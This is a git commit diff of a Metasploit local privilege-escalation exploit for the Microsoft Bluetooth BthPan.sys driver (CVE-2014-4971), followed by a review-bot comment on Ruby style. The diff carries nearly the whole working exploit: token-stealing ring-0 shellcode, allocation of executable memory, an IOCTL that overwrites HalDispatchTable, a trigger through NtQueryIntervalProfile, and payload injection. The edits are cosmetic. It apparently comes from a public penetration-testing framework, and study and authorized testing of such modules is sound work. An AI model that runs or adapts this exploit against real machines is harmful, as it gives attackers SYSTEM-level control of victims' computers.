Merge in changes from @todb-r7.

bug/bundler_fix
Jay Smith 2014-08-14 17:22:07 -04:00
parent 042278ed6a
commit b55f425ec0
1 changed files with 34 additions and 38 deletions


@ -14,12 +14,13 @@ class Metasploit3 < Msf::Exploit::Local
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
def initialize(info={})
super(update_info(info, {
'Name' => 'BthPan.sys Privilege Escalation',
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
'Description' => %q{
A vulnerability within BthPan module allows an attacker to inject memory they control
into an arbitrary location they define. This can be used by an attacker to overwrite
A vulnerability within Microsoft Bluetooth Personal Area Networking module,
BthPan.sys, can allow an attacker to inject memory controlled by the attacker
into an arbitrary location. This can be used by an attacker to overwrite
HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
NtQueryIntervalProfile.
},
@ -34,26 +35,25 @@ class Metasploit3 < Msf::Exploit::Local
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'EXITFUNC' => 'thread'
},
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Windows XP SP3', { } ],
[ 'Automatic', {} ],
[ 'Windows XP SP3', {} ]
],
'References' =>
[
[ 'CVE', 'CVE-2014-4971' ],
[ 'CVE', '2014-4971' ],
[ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ]
],
'DisclosureDate'=> 'Jul 18 2014',
'DefaultTarget' => 0
}))
'DisclosureDate' => 'Jul 18 2014',
'DefaultTarget' => 0
))
end
def add_railgun_functions
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
session.railgun.add_function(
'psapi',
'EnumDeviceDrivers',
@ -75,7 +75,6 @@ class Metasploit3 < Msf::Exploit::Local
end
def open_device(dev)
invalid_handle_value = 0xFFFFFFFF
r = session.railgun.kernel32.CreateFileA(dev, "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
@ -84,24 +83,28 @@ class Metasploit3 < Msf::Exploit::Local
if handle == invalid_handle_value
return nil
else
return handle
end
return handle
end
# @return [Array, nil] the address and driver name or nil
# if the driver name of 'krnl' isn't found
def find_sys_base
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
addresses = results['lpImageBase'][0, results['lpcbNeeded']].unpack("V*")
driver_array = nil
addresses.each do |address|
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
current_drvname = results['lpBaseName'][0, results['return']]
if current_drvname.downcase.include?('krnl')
return [address, current_drvname]
driver_array = [address, current_drvname]
break
end
end
return nil
return driver_array
end
def ring0_shellcode
@ -118,14 +121,12 @@ class Metasploit3 < Msf::Exploit::Local
tokenswap << "\x39\x98\x84\x00\x00\x00"
tokenswap << "\x75\xED\x89\xB8\xC8"
tokenswap << "\x00\x00\x00\x61\xC3"
return tokenswap
end
def fill_memory(proc, address, length, content)
result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
if not proc.memory.writable?(address)
unless proc.memory.writable?(address)
vprint_error("Failed to allocate memory")
return nil
end
@ -147,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Local
vprint_status("Getting the Kernel module name...")
kernel_info = find_sys_base
if kernel_info.nil?
unless kernel_info
vprint_error("Failed to disclose the Kernel module name")
return nil
end
@ -180,19 +181,16 @@ class Metasploit3 < Msf::Exploit::Local
def check
add_railgun_functions
if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
return Exploit::CheckCode::Safe
end
os = sysinfo["OS"]
unless (os =~ /windows xp.*service pack 3/i)
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i
handle = open_device("\\\\.\\bthpan")
if handle.nil?
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Safe unless handle
session.railgun.kernel32.CloseHandle(handle)
return Exploit::CheckCode::Vulnerable
@ -239,26 +237,24 @@ class Metasploit3 < Msf::Exploit::Local
print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
session.railgun.kernel32.CloseHandle(handle)
print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
result = session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
print_status("Checking privileges after exploitation...")
if not is_system?
unless is_system?
fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
end
print_good("Privilege escalation successful!")
p = payload.encoded
print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
if !execute_shellcode(p)
print_status("Injecting #{p.length} bytes to memory and executing it...")
unless execute_shellcode(p)
fail_with(Failure::Unknown, "Error while executing the payload")
end
end
end
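Review bot: In find_sys_base (the `@ -84,24 +83,28 @@` hunk) the early `return [address, current_drvname]` was replaced by a `driver_array` flag plus `break` and a trailing `return driver_array`, which adds a mutable local for the same result; an early return from inside `each` is the idiomatic guard exit here. I would drop `driver_array = nil`, write the match as `return [address, current_drvname] if current_drvname.downcase.include?('krnl')`, and end the method with a bare `nil`. The inner `results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)` also reuses the name of the outer `results` from EnumDeviceDrivers, so a distinct name such as `name_info` would make the two hashes easier to tell apart. The `# @return [Array, nil]` comment above the method already documents the nil case and stays accurate with this shape.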